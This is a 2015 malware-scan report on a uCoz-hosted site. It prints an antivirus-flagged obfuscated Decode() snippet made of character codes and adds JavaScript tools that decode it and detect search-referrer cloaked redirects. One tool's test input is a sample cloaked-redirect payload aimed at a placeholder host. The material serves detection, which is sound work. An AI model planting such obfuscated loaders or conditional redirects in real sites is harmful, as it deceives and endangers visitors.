Scanned pages/files
Request | Server response | Status |
http://monitoring-vip.clan.su/ | 200 OK Content-Length: 31058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
<!-- function Decode(){var temp="",i,c=0,out="";var str="60!84!68!32!119!105!100!116!104!61!34!55!48!48!34!32!98!97!99!107!103!114!111!117!110!100!61!34!115!107!105!110!47!111!115!110!95!51!46!106!112!103!34!32!104!101!105!103!104!116!61!34!49!55!51!34!32!105!100!61!34!116!100!50!56!48!34!62!38!110!98!115!112!59!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!66!82!62!60!66
Antivirus reports:
http://wow-files.ru/sun_43171.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 04 Aug 2015 18:37:48 GMT Accept-Ranges: bytes ETag: "a62-50e30a7dd378e" Server: nginx/1.9.2 Content-Length: 2658 Content-Type: text/html Last-Modified: Tue, 03 Feb 2015 15:23:41 GMT | clean |
http://wow-files.ru/index.html | 200 OK Content-Length: 66264 Content-Type: text/html | suspicious |
Suspicious code found
<script type='text/javascript' language='javascript' src='includes/javascript/kr_dropdown.js'></script> <div class="showpic" id="showpic" style="display: none;"> <table class='showpics' cellpadding='0' cellspacing='0'> <tr> <td width='7'><img src='templates/wow/images/publisher_left_top.gif' width='7' height='7' alt='' /></td> <td class='publisher-top'><img src='templates/wow/images/pixel.gif' width='1' hei </div> <div class="cl"> </div> </div> <script language='javascript' type='text/javascript'> if(!thisStatusBlock){var thisStatusBlock = new Array();thisStatusBlock[thisStatusBlock.length] = 0;} else thisStatusBlock[thisStatusBlock.length] = 0;</script>
http://wow-files.ru/includes/javascript/function.js | 200 OK Content-Length: 13415 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_showhints.js | 200 OK Content-Length: 1657 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_switchcontent.js | 200 OK Content-Length: 2747 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_validati.js | 200 OK Content-Length: 1921 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_ajax.js | 200 OK Content-Length: 28341 Content-Type: application/x-javascript | clean |
http://wow-files.ru/templates/wow/jsconfig.js | 200 OK Content-Length: 129 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/highslide.js | 200 OK Content-Length: 40435 Content-Type: application/x-javascript | clean |
http://wow-files.ru/templates/wow/js/jquery.js | 200 OK Content-Length: 72326 Content-Type: application/x-javascript | clean |
http://wow-files.ru/templates/wow/js/mw_hint.js | 200 OK Content-Length: 1064 Content-Type: application/x-javascript | clean |
http://wow-files.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 404 Not Found Connection: close Date: Tue, 04 Aug 2015 18:37:49 GMT Accept-Ranges: bytes ETag: "a62-50e30a7dd378e" Server: nginx/1.9.2 Vary: Accept-Encoding Content-Length: 2658 Content-Type: text/html Last-Modified: Tue, 03 Feb 2015 15:23:41 GMT | clean |
http://wow-files.ru/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 04 Aug 2015 18:37:49 GMT Accept-Ranges: bytes ETag: "a62-50e30a7dd378e" Server: nginx/1.9.2 Content-Length: 2658 Content-Type: text/html Last-Modified: Tue, 03 Feb 2015 15:23:41 GMT | clean |
http://s45.ucoz.net/src/jquery-1.6.1.js | 200 OK Content-Length: 101532 Content-Type: text/javascript | clean |
http://s45.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s45.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
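The snippet flagged on monitoring-vip.clan.su above is a Decode() routine fed a string of decimal character codes separated by "!". The following is an added example, not the scanner's code and not code from the scanned site: it decodes that encoding, pulls such literals out of raw page HTML, and applies a crude verdict to the decoded text. The sample input is the visible prefix quoted in the report, wrapped in the same `var str="..."` scaffolding; the report truncates the literal, so the closing quote is supplied here. The function names and the active-content heuristic are this example's own.

```javascript
// Added example, not part of the scan report or of the scanned site's code:
// a decoder for the "!"-separated decimal character codes consumed by the
// Decode() routine flagged on monitoring-vip.clan.su, plus a crude triage of
// what the decoded text contains.
'use strict';

// "60!84!68" -> "<TD". A trailing separator or a cut-off final code is
// tolerated, since the report above quotes the string truncated.
function decodeBangCodes(encoded) {
  return encoded
    .split('!')
    .filter((tok) => tok.length > 0)
    .map((tok) => {
      if (!/^\d+$/.test(tok)) {
        throw new Error(`not a character code: ${JSON.stringify(tok)}`);
      }
      const code = Number(tok);
      if (code > 0x10ffff) {
        throw new Error(`code point out of range: ${tok}`);
      }
      return String.fromCodePoint(code);
    })
    .join('');
}

// Locate every double-quoted literal made only of digits and "!" in a blob of
// HTML/JS (the shape of `var str="..."` in the flagged snippet) and decode it.
const BANG_LITERAL = /"((?:\d{1,7}!)+\d{0,7})"/g;

function extractBangStrings(html) {
  const found = [];
  for (const m of html.matchAll(BANG_LITERAL)) {
    found.push({ encoded: m[1], decoded: decodeBangCodes(m[1]) });
  }
  return found;
}

// Heuristic verdict on the decoded text (this example's own, not the
// scanner's): does it carry markup that executes or loads content, or only
// layout tags such as <TD> and <TABLE>?
const ACTIVE_MARKUP =
  /<\s*(script|iframe|object|embed)\b|javascript:|document\.write|\beval\s*\(/i;

function classifyDecoded(decoded) {
  return ACTIVE_MARKUP.test(decoded) ? 'active-content' : 'layout-only';
}

function triage(html) {
  return extractBangStrings(html).map(({ encoded, decoded }) => ({
    encodedLength: encoded.length,
    verdict: classifyDecoded(decoded),
    preview: decoded.slice(0, 80),
  }));
}

// Constructed sample: the visible prefix of the flagged string, copied from
// the report above, wrapped in the same Decode() scaffolding. The report cuts
// the literal off, so the closing quote is added here.
const FLAGGED_PREFIX =
  '60!84!68!32!119!105!100!116!104!61!34!55!48!48!34!32!98!97!99!107!103!114!111!117!110!100!61!34!115!107!105!110!47!111!115!110!95!51!46!106!112!103!34!32!104!101!105!103!104!116!61!34!49!55!51!34!32!105!100!61!34!116!100!50!56!48!34!62!38!110!98!115!112!59!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!66!82!62!60!66';
const SAMPLE_PAGE =
  '<!-- function Decode(){var temp="",i,c=0,out="";var str="' + FLAGGED_PREFIX + '";';

console.log(triage(SAMPLE_PAGE));
```

On the prefix the report shows, the verdict is layout-only: the codes decode to a `<TD width="700" background="skin/osn_3.jpg" ...>` cell followed by closing table tags and a `<BR><B`. That says nothing about the part of the literal the report truncates, which is the only place anything more than layout markup could sit, so the antivirus verdict cannot be reproduced or refuted from this page alone; fetch the full string before deciding.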
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: monitoring-vip.clan.su
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Aug 2015 18:37:44 GMT
Server: uServ/3.2.2
Content-Length: 31058
Content-Type: text/html; charset=UTF-8
...31058 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: monitoring-vip.clan.su
Referer: http://www.google.com/search?q=monitoring-vip.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
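The check above compares a plain visit with one carrying a search-engine Referer, because a cloaked site serves the redirect only to visitors who arrive from a search result. The following is an added example, not the scanner's code, that performs that comparison on two already-captured responses rather than fetching anything. Both inputs are constructed: the first pair mirrors what the report records for monitoring-vip.clan.su (the same 200 page both times), the second is a hypothetical cloaked server, and `example.invalid` is a placeholder target.

```javascript
// Added example, not the scanner's own code: the "Malicious Redirects" check
// above reduced to its essence. Given two captured responses for the same URL,
// one from a plain visit and one sent with a search-engine Referer, list the
// redirect targets each one carries and flag targets that appear only in the
// Referer-bearing visit.
'use strict';

// Redirect targets in one captured response: 3xx Location header,
// <meta http-equiv="refresh" ... url=...>, and script assignments such as
// top.location.href = "...", location.replace("..."), location.assign("...").
function extractRedirectTargets(resp) {
  const targets = new Set();
  const headers = {};
  for (const [k, v] of Object.entries(resp.headers || {})) {
    headers[k.toLowerCase()] = v;
  }
  if (resp.status >= 300 && resp.status < 400 && headers.location) {
    targets.add(headers.location.trim());
  }
  const body = resp.body || '';
  // Attribute order inside <meta> varies, so find the tag first, then the url.
  for (const tag of body.match(/<meta\b[^>]*>/gi) || []) {
    if (!/http-equiv\s*=\s*["']?refresh/i.test(tag)) continue;
    const m = /url\s*=\s*["']?([^"'>\s]+)/i.exec(tag);
    if (m) targets.add(m[1]);
  }
  const JS_REDIRECT =
    /\blocation(?:\.href)?\s*(?:=|\.replace\s*\(|\.assign\s*\()\s*["']([^"']+)["']/gi;
  for (const m of body.matchAll(JS_REDIRECT)) targets.add(m[1]);
  return [...targets];
}

// A conditional (cloaked) redirect is a target that only shows up when the
// request looks like it came from a search result.
function compareVisits(normalVisit, searchVisit) {
  const baseline = new Set(extractRedirectTargets(normalVisit));
  const newTargets = extractRedirectTargets(searchVisit).filter((t) => !baseline.has(t));
  return { suspicious: newTargets.length > 0, newTargets };
}

// Constructed inputs. PLAIN_VISIT stands in for what the report records for
// monitoring-vip.clan.su: the same 200 page for both queries.
// CLOAKED_SEARCH_VISIT is a hypothetical server answering the search-referred
// visit with a meta refresh plus a script redirect; example.invalid is a
// placeholder, not a real destination.
const PLAIN_VISIT = {
  status: 200,
  headers: { 'Content-Type': 'text/html; charset=UTF-8' },
  body: '<html><body><h1>Monitoring</h1><p>Server list</p></body></html>',
};
const CLOAKED_SEARCH_VISIT = {
  status: 200,
  headers: { 'Content-Type': 'text/html; charset=UTF-8' },
  body:
    '<html><head><meta http-equiv="refresh" content="0;url=http://example.invalid/landing"></head>' +
    '<body><script>if(document.referrer.indexOf("google")!==-1){top.location.href="http://example.invalid/second-hop";}</script></body></html>',
};

console.log(compareVisits(PLAIN_VISIT, PLAIN_VISIT)); // same page twice: nothing new
console.log(compareVisits(PLAIN_VISIT, CLOAKED_SEARCH_VISIT)); // targets only the search visit has
```

When both captures are the same page, as in the report above, the comparison yields no new targets. The check is only as good as the capture: a redirect keyed on User-Agent, IP range or time of day will not show up from a Referer-only comparison, so a clean result here means "no Referer-conditional redirect", not "no redirect".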
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=monitoring-vip.clan.su
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://monitoring-vip.clan.su/
Result: monitoring-vip.clan.su is not infected or malware details are not published yet.